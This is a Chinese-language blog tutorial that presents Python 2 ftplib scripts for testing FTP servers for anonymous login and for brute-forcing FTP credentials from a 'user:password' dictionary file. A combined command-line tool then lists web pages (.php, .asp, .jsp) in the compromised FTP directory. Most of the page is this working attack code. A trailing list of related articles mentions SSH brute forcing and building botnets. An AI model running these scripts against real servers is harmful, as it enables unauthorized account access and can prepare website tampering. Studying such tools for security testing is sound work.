Python脚本暴力破解FTP口令(ftplib)
目录
环境:Windows python2.7.15
ftplib模块是python下用于ftp服务的模块 。
判断FTP服务器是否允许匿名登录
以下代码是判断FTP服务器是否允许匿名登录
我们写了一个anonLogin() 函数,使用 ftp.login()方法进行匿名登录,如果没有抛出异常,说明FTP服务器允许匿名登录。反之不允许。
# -*- coding: utf-8 -*-
"""
Created on Sun Nov 4 10:25:17 2018
@author: 小谢
"""
import ftplib
def anonLogin(hostname):
try:
ftp=ftplib.FTP(hostname) #实例化FTP连接
ftp.login('anonymous','') #匿名登录
print '\n[*] '+hostname+' FTP Anonymous Login Succeeded!'
ftp.quit() #退出FTP
return True
except Exception,e: #如果捕获到异常,说明不允许匿名登录
print '\n[-] '+str(hostname)+' FTP Anonymous Login Failed!'
return False
anonLogin('127.0.0.1')
暴力破解FTP口令
如果ftp服务器不允许匿名登录呢,我们就需要通过密码字典暴力破解ftp口令。我们通过读取密码字典中的用户名和口令,一个一个去尝试登录,如果没捕获到异常,说明用户名和口令正确!密码字典中用户名和口令用 : 分隔。
# -*- coding: utf-8 -*-
"""
Created on Sun Nov 4 10:36:49 2018
@author: 小谢
"""
import ftplib
def bruteLogin(hostname,passwdFile):
f=open(passwdFile,'r')
lines=f.readlines()
for line in lines:
user=line.split(":")[0] #用户名
passwd=line.split(":")[1].strip("\n") #密码
print '[+] Trying: '+user+": "+passwd
try:
ftp=ftplib.FTP(hostname) #实例化FTP连接
ftp.login(user,passwd) #登录
print '\n[*] '+hostname +' FTP Login Succeeded!'
ftp.quit() #退出FTP
return(user,passwd) #返回用户名和密码
except Exception,e:
pass
print '\n[-] Could not brute force FTP credentials!'
return(None,None)
a=bruteLogin("127.0.0.1","key.txt")
print("User:%s Password:%s"%a)
列出FTP目录内的网页文件
在得到了用户名和口令之后,我们就可以列出FTP目录下的文件,看是否存在网页文件。注意,我们这里只能判断FTP目录这一级的文件,而不能递归的判断目录内的文件。因为我们只知道FTP目录的相对路径,而不知道绝对路径!
# -*- coding: utf-8 -*-
"""
Created on Sun Nov 4 10:51:13 2018
@author: 小谢
"""
import ftplib
import os
def returnDefault(ftp):
try:
dirList=ftp.nlst() #列出FTP目录下的文件或目录
except:
dirList=[]
print '[-] Could not list directory contents!'
return
retList=[]
for filename in dirList:
fn=filename.lower() #将目录名转换为小写
if '.php' in fn or '.html' in fn or '.asp' in fn or '.jsp' in fn or '.htm' in fn:
print'[+] Found default page:'+filename
retList.append(filename)
return retList
def main():
ftp=ftplib.FTP("127.0.0.1") #实例化FTP连接
ftp.login("admin","root")
a=returnDefault(ftp)
if a:
print("Defalut Page List:")
for i in a:
print(i)
main()
综合
我们可以结合前面三个脚本,写一个汇总的脚本。当用户执行脚本的时候,没加 -F/-f 参数指定密码字典的时候,就默认查看FTP服务器是否可匿名登录,如果可匿名登录,则列出FTP目录下的网页文件。如果不能匿名登录,就提示不能匿名登录。当指定了-F/-f 参数的话,就暴力破解 FTP 口令,如果破解成功了,则列出FTP目录下是的网页文件。
# -*- coding: utf-8 -*-
"""
Created on Sun Nov 4 12:12:41 2018
@author: 小谢
"""
import parser
import optparse
import ftplib
def anonLogin(hostname): #验证是否可匿名登录
try:
ftp=ftplib.FTP(hostname)
ftp.login('','') #匿名登录
print '\n[*] '+hostname +' FTP Anonymous Login Succeeded!'
return (True,ftp)
except:
print '\n[-] '+str(hostname)+' FTP Anonymous Login Failed!'
return (False,ftp)
def bruteLogin(hostname,passwdFile): #暴力破解
f=open(passwdFile,'r')
lines=f.readlines()
for line in lines:
user=line.split(":")[0] #用户名
passwd=line.split(":")[1].strip("\n") #密码
try:
ftp=ftplib.FTP(hostname)
ftp.login(user,passwd)
print '\n[*] '+hostname +' FTP Login Succeeded!'
print("User:%s Password:%s"%(user,passwd))
return(True,ftp)
except Exception,e:
pass
print '\n[-] Could not brute force FTP credentials!'
return(False,ftp)
def returnDefault(ftp): #列出FTP目录下的网页文件
try:
dirList=ftp.nlst() #列出FTP目录下的文件或目录
except Exception,e:
print e
print '[-] Could not list directory contents!'
return
retList=[]
for filename in dirList:
fn=filename.lower() #将目录名转换为小写
if '.php' in fn or '.html' in fn or '.asp' in fn or '.jsp' in fn or '.htm' in fn:
print'[+] Found default page:'+filename
retList.append(filename)
return retList
def main():
usage="python %prog -H <target host> -F/f <password file>" #显示文件的用法帮助信息
parser=optparse.OptionParser(usage) #实例化一个对象
parser.add_option('-H',dest='Host',type='string',help='target host')
parser.add_option('-f','-F',dest='File',type='string',help='target host')
(options,args)=parser.parse_args()
Host=options.Host
File=options.File
if Host==None:
print(parser.usage)
exit(0)
if File==None:
a=anonLogin(Host)
if a[0]:
returnDefault(a[1])
else:
b=bruteLogin(Host,File)
if b[0]:
returnDefault(b[1])
return
if __name__=="__main__":
main()
Python脚本暴力破解FTP口令(ftplib)的更多相关文章
- Python脚本暴力破解SSH口令以及构建僵尸网络(pxssh)
目录 暴力破解SSH口令 SSH远端执行命令 构建僵尸网络 环境:Kali Linux python 2.7.13 暴力破解SSH口令 Pxssh是pexpect库的ssh专用脚本,他能用预先写好的 ...
- [小技巧] Python 脚本暴力破解 HC2600 机顶盒管理密码
家里最近接入了广电有线电视,配了三个创维 HC2600 机顶盒,并且每个机顶盒还带有无线路由器功能. 免费赠送 Internet 接入服务倒也没什么,不过机顶盒内置的 WIFI 实在有点寒酸:只支持 ...
- 暴力破解FTP服务器技术探讨与防范措施
暴力破解FTP服务器技术探讨与防范措施 随着Internet的发展出现了由于大量傻瓜化黑客工具任何一种黑客攻击手段的门槛都降低了很多但是暴力破解法的工具制作都已经非常容易大家通常会认为暴力破解攻击只是 ...
- XAMPP、PHPstorm和PHPcharm和Windows环境下Python搭建+暴力破解
XAMPP的安装和使用 一.什么是XAMPP? XAMPP是最流行的PHP开发环境. XAMPP是完全免费且易于安装的Apache发行版,其中包含Apache.MariaDB.PHP和Perl. 类似 ...
- Python脚本自动化破解大白鲨摄像头(Shodan)
关于本文的技术知识点,Shodan模块的用法,传送门--> Python中shadon模块的使用 Shodan的使用 今天我们要利用python进行自动化破解的摄像头叫大白鲨摄像头,他的 ...
- Python最新暴力破解WiFi,攻破所有密码限制,最强破解!
暴力破解wifi密码 这个代码也是非常简单,这里需要用Python中的pywifi这个库,所以需要在DOS命令下安装这个库,同样使用pip install pywifi,很简单就安装成功了,我用的是P ...
- python 编写暴力破解mysql用户名密码
本文摘自别人的,自己运行调试了一下#!/user/bin/env python#-*- coding:utf-8 -*- import pymysql#导入连接数据库的模块import sys cla ...
- Fast RDP Brute暴力破解3389口令
http://www.tuicool.com/articles/b67rQfr 下载地址:https://www.rekings.com/fast-rdp-brute-gui-v2-0/
- python实现暴力破解
import urllib2 import urllib import cookielib import threading import sys import Queue from HTMLPars ...
随机推荐
- Webpack 基石 tapable 揭秘
Webpack 基于 tapable 构建了其复杂庞大的流程管理系统,基于 tapable 的架构不仅解耦了流程节点和流程的具体实现,还保证了 Webpack 强大的扩展能力:学习掌握tapable, ...
- FreeBSD 入门导言
→→→→→导言: 导言,这一部分通常也被称作"前言"."导论"."概论"."楔子"."写在前面".& ...
- JVM笔记--如果你写JVM,最需要考虑的重要结构是什么?
开局一张图,前面已经从每一部分解析过JVM的内存结构了,现在按照顺序来分析: 整体上来看:类文件从类加载子系统,加载完成之后,主要存放在方法区(JRockit和H9没有方法区,这里指的是HotSpot ...
- Java 操作PPT数字签名(一):添加、检测、删除签名
本文简要概述如何通过Java程序来处理PPT中的数字签名,文章主要分三个部分来介绍,即数字签名的添加.验证以及删除. 基本操作思路: 1. 添加签名:[加载PPT文档]→[添加签名]→[保存文档] 2 ...
- IT培训有哪些坑(三)?
我们继续来说说IT培训的坑,今天讲的这点,非常重要,几乎适合于所有层面的培训,不仅仅是IT行业.近期有参加各种培训打算的,包括各种营销培训,管理培训等等,都是有用的. 有大企业,名人背景的不靠谱.不要 ...
- OAuth2.0授权码模式实战
OAuth2.0是目前比较流行的一种开源授权协议,可以用来授权第三方应用,允许在不将用户名和密码提供给第三方应用的情况下获取一定的用户资源,目前很多网站或APP基于微信或QQ的第三方登录方式都是基于O ...
- PAT (Advanced Level) Practice 1011 World Cup Betting (20 分) 凌宸1642
PAT (Advanced Level) Practice 1011 World Cup Betting (20 分) 凌宸1642 题目描述: With the 2010 FIFA World Cu ...
- ABP 适用性改造 - 添加 API 版本化支持
Overview 在前面的文章里有针对 abp 的项目模板进行简化,构建了一个精简的项目模板,在使用过程中,因为我们暴露的 api 需要包含版本信息,我们采取的方式是将 api 的版本号包含在资源的 ...
- python学习 -- operator.itemgetter(), list.sort/sorted 以及lambda函数
Python 中有非常方便高效的排序函数,下面主要介绍如何sort/sorted对list,dict进行排序. 1. 用list.sort /sorted 对list of tuples中第二个值进行 ...
- PAT A1052 Linked List Sorting
题意:给出N个结点的地址address.数据域data以及指针域next,然后给出链表的首地址,要求把在这个链表上的结点按data值从小到大输出.样例解释:按照输入,这条链表是这样的(结点格式为[ad ...